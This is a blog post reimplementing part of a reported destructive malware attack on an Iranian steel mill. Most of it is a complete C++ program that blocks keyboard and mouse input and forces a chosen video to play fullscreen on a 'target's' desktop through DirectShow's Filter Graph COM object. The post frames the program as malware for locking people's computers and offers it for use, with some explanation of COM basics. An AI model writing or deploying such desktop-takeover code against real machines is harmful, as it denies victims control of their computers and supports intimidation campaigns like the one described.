Forcing A Video Takeover of Your Target's Desktop Using the Filter Graph COM Object

Do you like locking people's computers? How about forcing them to watch whatever video you please? Well do I have a program for you.

Forcing A Video Takeover of Your Target's Desktop Using the Filter Graph COM Object

It's been quite a while since I last posted. Much like Batman returning from training under Ra's al Ghul at the Monastery home of the League of Shadows, I've been working on some of the dark arts. Welcome to the incredibly masochistic world of COM Programming.

https://twitter.com/GonjeshkeDarand/status/1541288345183158272?s=20&t=RqOnOPEmID18F3TzPF7cRQ

Last week this pretty dope malware absolutely trashed an Iranian Steel Mill, so I went and grabbed some of the DFIR reports to find out what exactly it did. Then, picked out the interesting parts and decided to reimplement parts of their malware.

Turns out the writers have been using the Filter Graph COM object to display a video that describes the other targets they messed up in their campaign and threaten their targets with other future targets.  Let me present exhibit A:

Exhibit A

Before we jump into the code, let's talk about the basics of a COM.

COM stands for Component Object Model and was mostly credited to three Microsoft architects who didn't believe Object Oriented Programming (OOP) was being used correctly. Without debating whether OOP is being used correctly throughout the industry, it's a sort of a plug-in style architecture for API's that creates a malleable approach to building systems and applications. Unfortunately, the learning curve can be steep as resources for learning COM are few and far between, which means you better be a masochist on the keys because Windows is heavily built on top of it. You should probably wait until you're at least a little bit comfortable with C++ and the WinAPI before attempting.

Welcome COM hell

On to the technical side. If you don't like the nitty gritty, Computer Science-y technical details, you should exit stage right. From MSDN, "The Microsoft DirectShow application programming interface (API) is a media-streaming architecture for Microsoft Windows." Within this API exists the Filter Graph object which contains all of our video rendering interfaces and methods that we need.

Lingo bingo detour from MSDN:

In COM, an object is overarching body that contains interfaces for communicating with the object and methods that further define those interfaces. "An interface is a contract that consists of a group of function prototypes." Methods provide definitions for these prototypes. In summation, we can use one application to talk to multiple different objects (like filter graph for video rendering or WMI Instances) through interfaces that are active within the current context of our application.

Now to the code:

#include <dshow.h>
#include <iostream>
#include <Windows.h>

#pragma comment (lib, "Strmiids.lib")

HRESULT playMedia(wchar_t* file) 
{
	IGraphBuilder* pGraph = NULL; //Initialize Graph object
	IMediaControl* pControl = NULL;
	IMediaEvent* pEvent = NULL;
	IVideoWindow* ppWc = NULL;
	LONG evCode = 0;
	HRESULT hr = CoInitialize(NULL); //Initialize COM library

	//Create the Capture Graph Builder
	hr = CoCreateInstance(CLSID_FilterGraph, 
    NULL,
    CLSCTX_INPROC_SERVER,
    IID_IGraphBuilder,
    (void**) &pGraph);
    
	if (SUCCEEDED(hr))
	{
		hr = pGraph->QueryInterface(IID_IMediaControl,
        (void**)&pControl);//Create Media control for streaming control
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in pControl\n");
			return hr;
		}
		hr = pGraph->QueryInterface(IID_IMediaEvent,
        (void**)&pEvent);//Create a media event
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in MediaEvent\n");
			pControl->Release();
			return hr;
		}
		hr = pGraph->RenderFile(file, NULL);//RenderFile
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in Rendering file\n");
			pControl->Release();
			pEvent->Release();
			return hr;
		}
		hr = pGraph->QueryInterface(IID_IVideoWindow, (void**)&ppWc);
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in pControl\n");
			pControl->Release();
			pEvent->Release();
			pGraph->Release();
			return hr;
		}
		hr = ppWc->put_FullScreenMode(OATRUE);
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in pControl\n");
			pControl->Release();
			pEvent->Release();
			ppWc->Release();
			pGraph->Release();
			return hr;
		}
		hr = pControl->Run();
		if (FAILED(hr))
		{
			OutputDebugStringW(L"[-] Error in pControl\n");
			pControl->Release();
			pEvent->Release();
			pGraph->Release();
			return hr;
		}
		pEvent->WaitForCompletion(INFINITE, &evCode);
	}
	pControl->Release();
	pEvent->Release();
	pGraph->Release();
	CoUninitialize();
	return hr; //Failure
}

BOOL toggleKeyboard(BOOL toggle)
{
	BOOL bResult = FALSE;
	if (TRUE == toggle)
	{//Block input
		if (0 != BlockInput(TRUE))
			bResult = TRUE;
	}
	else
	{//Enable input
		if (0 != BlockInput(FALSE))
			bResult = TRUE;
	}
	return bResult;
}

int wmain(int argc, wchar_t* argv[])
{
	HRESULT hrRet = NULL;
	BOOL bRet = FALSE;
	wchar_t* video = argv[1];

	bRet = toggleKeyboard(TRUE);
	if (FALSE == bRet)
	{
		OutputDebugStringW(L"[-] Failed to toggle peripherals\n");
	}

	hrRet = playMedia(video);
	if (FAILED(hrRet))
	{
		OutputDebugStringW(L"[-] Failed to Stream images\n");
	}
	
	bRet = toggleKeyboard(FALSE);
	if (FALSE == bRet)
	{
		OutputDebugStringW(L"[-] Failed to toggle peripherals\n");
	}

	return 0;
}

This implementation is pretty straight forward, so I'm sure the actual malware did some more funky stuff like switching over to a screensaver to lock the computer then disabling CTRL+ALT+DELETE with a kernel driver that hooks the sys call for it or something.

Initially, I blocked all keyboard and mouse input from user mode. It locks all input except for major system interrupts, specifically CTRL+ALT+DELETE. Whatever, we need a failsafe anyway because hard rebooting my machine due to my own stupidity isn't on the agenda today, Satan.

How The 

DirectShow uses filters which do an operation on a multimedia stream. The image above shows our goal of streaming a video from the hard drive to our visual and audio peripherals.

To start, we initialize all our interface variables. After creating an instance of FilterGraph Object, we create the interfaces using the QueryInterface method to set our variables to the interfaces we need. Now I didn't do anything with the media events, but you can use it to handle different situation like if another process attempts to remotely shut down the process or a fatal error. Then, render the file for the application to load the video into memory. As far as file formats supported, check out this page. I got away with using a .gif. Pretty sure the Malware uses an .MP4.

Then, I threw it into fullscreen mode using put_FullScreenMode(OATRUE) on the VideoWindow interface to make it seem like it wasn't closeable and block out anything else on the screen. Run it to wrap it all up and we're good to go.

You, yes you, just did that

Congrats, you just made some simple malware.

https://docs.microsoft.com/en-us/windows/win32/com/interfaces-and-interface-implementations

https://docs.microsoft.com/en-us/windows/win32/directshow/filter-graph-manager

https://docs.microsoft.com/en-us/windows/win32/directshow/using-windowless-mode

https://docs.microsoft.com/en-us/windows/win32/directshow/introduction-to-directshow-application-programming